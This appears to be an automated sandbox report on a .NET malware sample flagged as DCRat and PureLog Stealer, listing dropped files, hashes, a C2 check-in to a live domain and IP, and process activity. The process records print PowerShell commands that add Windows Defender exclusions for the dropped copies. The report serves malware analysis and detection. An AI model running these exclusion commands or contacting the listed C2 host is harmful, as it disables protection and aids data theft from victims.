                                                                            C:\Windows\Migration\WTR\GFIYCbjKVID.exe:Zone.Identifier

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\ntoskrnl2.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):26
                                                                            Entropy (8bit):3.95006375643621
                                                                            Encrypted:false
                                                                            SSDEEP:3:ggPYV:rPYV
                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                            Malicious:false
                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                            C:\Windows\Migration\WTR\d899e5aa4a0be6

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\ntoskrnl2.exe
                                                                            File Type:ASCII text, with very long lines (716), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):716
                                                                            Entropy (8bit):5.903712888729033
                                                                            Encrypted:false
                                                                            SSDEEP:12:lO7xMGtGuEGfSCJilYzHDGRilfQ3moOg8mKCeh7JK4Dzarv:o6cNTS1lYzHDGglfYmtJ1z6
                                                                            MD5:9C630B17CEC8CC9EC20DDE6CDDB20D27
                                                                            SHA1:E1C0B1D1BF6AE64685723B6229FB7D198EB2756E
                                                                            SHA-256:6F47A23EE5401D9C61D104E188B2EFB3289323243446470D4007ABDD85FB839F
                                                                            SHA-512:D22F41196AAF5039D0A84BAEF8866C7E4CA8E39C0ABF1A6E8ADDC7ABFABD111312750066A9CE369EE32B7121D272F9B231DB33FA814A06FC33CA2D2BFCDFA7EB
                                                                            Malicious:false
                                                                            Preview:Tda35Ngsha4oSz2V08S7D2tLOTzZAP71ddDqbSTt2q4Uy3xdJf8e4opbuPpmYHsScDKzwM4ioiEW8YWUfVPfQc7yym6LnrVu7m1vs8r7ka0VjSdV2UGC2NBAFVAKPs47NUZVglmhoR40lmOgIlTTkT1ul1pX8gs2g3HP3HyRsjXlSLYdGeBoZkW4coup5OjIjCTse9nBwBlB5QcZdLQdfDc6gNxPWJVd9PCQ1p9H1A2X8V8LLULt8FmfjWMQLYompIBqOMixMImeLF8KPlDB7me4mgqeds6cWPrzUR79wYg0cIUeYBBkUmoDoGErfDTeMJI5XI07nDPjFnbeLLGcqVItknLNNQesECoS9YGQKE6RWF8ApkfT71x0BYVu7muXjgfD9IewFzSmZ0XfpKinuKvNOxRlDWShUjs0j4AgGtOHjLbLB0ExEGnYvSyL12tshuSzIh5uJChB6noDWFkNSfdN6TERGzoN9fky3lDe4TnCjlcHovzvSfaCRF3ycnoUXTBaDzJuCFT81anU06nU924eEihxsOBQoToQkCEylFtMMbK0ci7fATUeZhVfSWBxECTiwXuy2yt4JrRnXqVKQgQV8K0CqigPD5IKHmEFyJmMkaVrPsIlA1ghw8jlgrIURd0NiHfvmQVH3DuizJw7a5OLYkYICciGBS4HjHJIMW8ufZosOBwX4K3WPpy7tWsJrPGkJn8rAovD

                                                                            C:\Windows\PLA\Templates\GFIYCbjKVID.exe

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\ntoskrnl2.exe
                                                                            File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                                                            Category:dropped
                                                                            Size (bytes):1430164
                                                                            Entropy (8bit):7.968311057541044
                                                                            Encrypted:false
                                                                            SSDEEP:24576:qQnFtu+zlSu7WlmZuTJ8BNTnCe2RmndNY2ncoC8OOGOFqZjkJe6QvX:Hpz7BNBNTnx2azxcoBrZS3fP
                                                                            MD5:C8848D70C25CF0A1E0A4122CAB55E5F8
                                                                            SHA1:20E0CFFE94951E3201CA5AA3F5A2876B20408702
                                                                            SHA-256:6EBED9F6DE82360A3724C5148EAACED3273CE3E48826492D87DA9D7E978EB6FC
                                                                            SHA-512:B93AADA5CDF824C5FEB5C2A992A92CB929479241E7895C42C8A6AF32B11C72767523D4ABD641C44A0B2E310288E533F7AEEF3F1931023AC72154171BC83D2CC0
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 76%
                                                                            Preview:MZ......................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@.. ....................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B...........................................................................v2.19@.......H.......d&...............................................................0............%..,....i-....+...........%..,....i-.....+...................XGR......8.........%.X.XG..........-.....c.........XG.b.X.......8....... ...._ .............:]........XJ..........-....c....X... ...._... .............-@....c....._..........-....X... ...._ ....X....a...+....._.X...+}....c....._....E............%...;...+V...?_.X..+K..X... ...._.AX....a..+3.. .?.._ A...X....X.+....XX... ...._ AD..X.

                                                                            C:\Windows\PLA\Templates\GFIYCbjKVID.exe:Zone.Identifier

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\ntoskrnl2.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):26
                                                                            Entropy (8bit):3.95006375643621
                                                                            Encrypted:false
                                                                            SSDEEP:3:ggPYV:rPYV
                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                            Malicious:false
                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                            C:\Windows\PLA\Templates\d899e5aa4a0be6

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\ntoskrnl2.exe
                                                                            File Type:ASCII text, with very long lines (913), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):913
                                                                            Entropy (8bit):5.905762643569593
                                                                            Encrypted:false
                                                                            SSDEEP:24:IeE8VZ/cmwNzJt5FAmwNjL4ok2aL9kayd9hhPEElPh8e:IeE8NwZJt5FHe34l2Xayte+58e
                                                                            MD5:FAD55E8DDA8D05196857C547F9FCFE04
                                                                            SHA1:1FCACD39636F87C06A792DE3D6FCC493F033EB0B
                                                                            SHA-256:C6D309A4366FD06E1974D28F4494856A323C6C9D1BD2FDB9733FE796C451929B
                                                                            SHA-512:1AB42E7A0E0E40B8CAE3FCC0077E33C7E897A046494E0F3191E1F6A9C73BECAEF348DE6440935B5B5628A5B6256EE2907FB427C9DD8CD3A5AB47DFFDF2BEF0C5
                                                                            Malicious:false
                                                                            Preview:SLZ0oyDQTDilDFWQZ0av8zBDcrdfDPMlvDYyO4ZHaZq2GS7kz5biHG5dKWY6UhND1709qiCeaSUiJI6Jt2qHyndoI5o1gcw2MmBJc84Q36HzwWTBaONb1FPNdM1u3K88fbWhGwqv8ZO1fo2vmnbRPUBHXxqQGKXs8JTUAw4nibdb0YryTGHQtqtKaOJTGaoxCg2WUhuzsytx1jQ8F16ACG9RZJ3wmlgHwpZUgVdvVSh476T17LNOdov5gk7Ln8NHRlALJ5cuXKoujEUdzCybYRoI4ex5YRHXEamW6HrBsc1S9BWcPdWlKwtA61RpIhWFCRpIb8hrVws5aVI2IVp45gMSrmZE0C3LFvPsVNAR6oPYDxjlsYgw1cKgEXayic1T2hzpFah4UX7RRyO4DyVcfHUnlto7wLtdx6gg74fS0lbde2OPIgvuHYxvNMEWwjIJoddUSs6JTDl3p0IsfYzPZ9WYJuSvzIgRdSzAZ37ZkmaDx3FWDW1Xu2tpHFLhaLTKhTaWBISlbZpxiTkPp5rdRIhljJ3UrZ9YTQgdctV5DP6UM6Gye52edz2Zwzx1O83BaRdSwGw5kwaCLNYnDFzvgf4eXHrn6eqEV435cyBXJ63rY0NjaJxJJHf5W94pZJ9GGWqQTdLPEbmjlNFh3HNwqg5OZ8ic3V897xkCJ7Q78iFre5TJ4XwR6Najbb0U4sVsdnmymDX51PxHbOteoZigjrDtXAlrG5CQMXN1Sfg190ZqZSINsWqfJzIwj2bmbpz6Mh4DA2LJ3rgtRXUE2Y9uPhGXPbSaE3ZUBdd2XEM0LglcTYfMiWuDpEqpahyjkuF9SLsx3bqxLJis6oD06G1rJVo6wyb0PnPablJHqrSGq62gg8swd8me3Y06hvBFA0hh3IRUe6JPxuAMdIayF

                                                                            \Device\Null

                                                                            Download File
                                                                            Process:C:\Windows\System32\PING.EXE
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):502
                                                                            Entropy (8bit):4.618657637432167
                                                                            Encrypted:false
                                                                            SSDEEP:12:PEUZw5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:sU8dUOAokItULVDv
                                                                            MD5:A8873AD91E10B5BC98B84EBAC26A50A7
                                                                            SHA1:91B23220CE75D2B3D119382E8ED49412EAF81884
                                                                            SHA-256:603BAF93B0565F3BD7172A3E00C133974742955DCA2649E9466D50D320DA2CFE
                                                                            SHA-512:DC1C3E9FB6372E6C5B5D63CA8707C434FD1D4EA4B10EEAE44034E44F71669E06A4A8A3095DA0C80A68D7FEE54179E30AA6D046F36041B36AF42566E71C2D090E
                                                                            Malicious:false
                                                                            Preview:..Pinging 888683 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                                                            Static File Info

                                                                            General

                                                                            File type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                                                            Entropy (8bit):7.968311057541044
                                                                            TrID:
                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                            • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:ntoskrnl2.exe
                                                                            File size:1'430'164 bytes
                                                                            MD5:c8848d70c25cf0a1e0a4122cab55e5f8
                                                                            SHA1:20e0cffe94951e3201ca5aa3f5a2876b20408702
                                                                            SHA256:6ebed9f6de82360a3724c5148eaaced3273ce3e48826492d87da9d7e978eb6fc
                                                                            SHA512:b93aada5cdf824c5feb5c2a992a92cb929479241e7895c42c8a6af32b11c72767523d4abd641c44a0b2e310288e533f7aeef3f1931023ac72154171bc83d2cc0
                                                                            SSDEEP:24576:qQnFtu+zlSu7WlmZuTJ8BNTnCe2RmndNY2ncoC8OOGOFqZjkJe6QvX:Hpz7BNBNTnx2azxcoBrZS3fP
                                                                            TLSH:B96533C578F13739C2F8E53F227DEC6881A8D04B89A55E670929B700DC2DEE14953BE6
                                                                            File Content Preview:MZ......................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@.. ....................`.............................

                                                                            File Icon

                                                                            Icon Hash:00928e8e8686b000

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x402e5e
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x4D0126C5 [Thu Dec 9 18:58:13 2010 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            jmp dword ptr [00402000h]
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al

                                                                            Data Directories

                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x2e0c0x4f.text
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x320.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x60000xc.reloc
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                            Sections

                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x20000xe640x10000baf8508519d41cdff0b3d392bf7f161False0.550048828125data5.290703402026259IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .rsrc0x40000x3200x400574e65dbca3f3dca430748b98fa97b40False0.3505859375data2.6411336922484443IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .reloc0x60000xc0x200e46a983141cb6c3ddecabc818112e4d9False1.017578125data6.602086536952082IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                            Resources

                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            RT_VERSION0x40580x2c8data0.46207865168539325

                                                                            Imports

                                                                            DLLImport
                                                                            mscoree.dll_CorExeMain

                                                                            Network Behavior

                                                                            Suricata IDS Alerts

                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2025-01-11T16:33:10.673093+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.54970437.44.238.25080TCP

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jan 11, 2025 16:33:09.907164097 CET4970480192.168.2.537.44.238.250
                                                                            Jan 11, 2025 16:33:09.912200928 CET804970437.44.238.250192.168.2.5
                                                                            Jan 11, 2025 16:33:09.912349939 CET4970480192.168.2.537.44.238.250
                                                                            Jan 11, 2025 16:33:09.912693977 CET4970480192.168.2.537.44.238.250
                                                                            Jan 11, 2025 16:33:09.917531967 CET804970437.44.238.250192.168.2.5
                                                                            Jan 11, 2025 16:33:10.267643929 CET4970480192.168.2.537.44.238.250
                                                                            Jan 11, 2025 16:33:10.272741079 CET804970437.44.238.250192.168.2.5
                                                                            Jan 11, 2025 16:33:10.557111979 CET804970437.44.238.250192.168.2.5
                                                                            Jan 11, 2025 16:33:10.673093081 CET4970480192.168.2.537.44.238.250
                                                                            Jan 11, 2025 16:33:10.707612038 CET804970437.44.238.250192.168.2.5
                                                                            Jan 11, 2025 16:33:10.737901926 CET4970480192.168.2.537.44.238.250

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jan 11, 2025 16:33:09.890188932 CET4924653192.168.2.51.1.1.1
                                                                            Jan 11, 2025 16:33:09.900217056 CET53492461.1.1.1192.168.2.5

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Jan 11, 2025 16:33:09.890188932 CET192.168.2.51.1.1.10xe33bStandard query (0)128538cm.n9shteam3.topA (IP address)IN (0x0001)false

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Jan 11, 2025 16:33:09.900217056 CET1.1.1.1192.168.2.50xe33bNo error (0)128538cm.n9shteam3.top37.44.238.250A (IP address)IN (0x0001)false

                                                                            HTTP Request Dependency Graph

                                                                            • 128538cm.n9shteam3.top

                                                                            HTTP Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.54970437.44.238.250807516C:\Users\user\Desktop\ntoskrnl2.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 11, 2025 16:33:09.912693977 CET345OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                            Host: 128538cm.n9shteam3.top
                                                                            Content-Length: 344
                                                                            Expect: 100-continue
                                                                            Connection: Keep-Alive
                                                                            Jan 11, 2025 16:33:10.267643929 CET344OUTData Raw: 00 01 04 01 06 0f 01 02 05 06 02 01 02 0d 01 07 00 07 05 0a 02 04 03 0e 03 0f 0e 54 06 53 06 05 0d 00 04 0c 03 03 07 05 0b 0b 05 04 05 07 06 0f 05 0a 0c 0f 0d 05 04 02 04 02 06 01 01 07 05 5f 02 50 0f 0d 07 54 07 07 0c 54 0b 0f 0f 0d 0e 54 06 54
                                                                            Data Ascii: TS_PTTTTU\L}P~`[]wqmufUkoawBZM|M]ZlUp_lYfJ|C|NwttOie~V@{}fO}ri
                                                                            Jan 11, 2025 16:33:10.557111979 CET25INHTTP/1.1 100 Continue
                                                                            Jan 11, 2025 16:33:10.707612038 CET376INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Sat, 11 Jan 2025 15:33:10 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Content-Length: 213
                                                                            Connection: keep-alive
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                            Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                            Statistics

                                                                            CPU Usage

                                                                            Click to jump to process

                                                                            Memory Usage

                                                                            Click to jump to process

                                                                            High Level Behavior Distribution

                                                                            Click to dive into process behavior distribution

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            General

                                                                            Target ID:0
                                                                            Start time:10:32:55
                                                                            Start date:11/01/2025
                                                                            Path:C:\Users\user\Desktop\ntoskrnl2.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Users\user\Desktop\ntoskrnl2.exe"
                                                                            Imagebase:0x4f0000
                                                                            File size:1'430'164 bytes
                                                                            MD5 hash:C8848D70C25CF0A1E0A4122CAB55E5F8
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: 00000000.00000002.2121676520.000000001B140000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2121676520.000000001B140000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.2104904231.000000001272D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2104904231.000000001272D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:20
                                                                            Start time:10:32:58
                                                                            Start date:11/01/2025
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exe'
                                                                            Imagebase:0x7ff7be880000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:21
                                                                            Start time:10:32:58
                                                                            Start date:11/01/2025
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\GFIYCbjKVID.exe'
                                                                            Imagebase:0x7ff7be880000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:22
                                                                            Start time:10:32:58
                                                                            Start date:11/01/2025
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff6d64d0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:23
                                                                            Start time:10:32:58
                                                                            Start date:11/01/2025
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\PLA\Templates\GFIYCbjKVID.exe'
                                                                            Imagebase:0x7ff7be880000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:24
                                                                            Start time:10:32:58
                                                                            Start date:11/01/2025
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff6d64d0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:25
                                                                            Start time:10:32:58
                                                                            Start date:11/01/2025
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Migration\WTR\GFIYCbjKVID.exe'
                                                                            Imagebase:0x7ff7be880000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:26
                                                                            Start time:10:32:58
                                                                            Start date:11/01/2025
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff6d64d0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:27
                                                                            Start time:10:32:58
                                                                            Start date:11/01/2025
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Containers\GFIYCbjKVID.exe'
                                                                            Imagebase:0x7ff7be880000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
